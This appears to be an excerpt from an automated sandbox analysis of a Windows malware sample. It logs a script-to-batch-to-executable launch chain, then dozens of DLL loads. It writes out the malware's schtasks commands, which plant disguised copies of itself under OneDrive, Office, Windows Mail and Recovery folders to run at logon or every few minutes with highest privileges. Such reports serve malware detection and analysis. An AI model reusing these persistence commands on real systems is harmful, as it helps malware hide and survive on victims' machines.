            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe"
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe"
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\serversessionmonitor\blockfont.exe "C:\serversessionmonitor\blockfont.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe" Jump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: version.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: wldp.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: profapi.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: amsi.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: userenv.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: propsys.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: edputil.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: netutils.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: slc.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: sppc.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: apphelp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: version.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: wldp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: profapi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rsaenh.dll
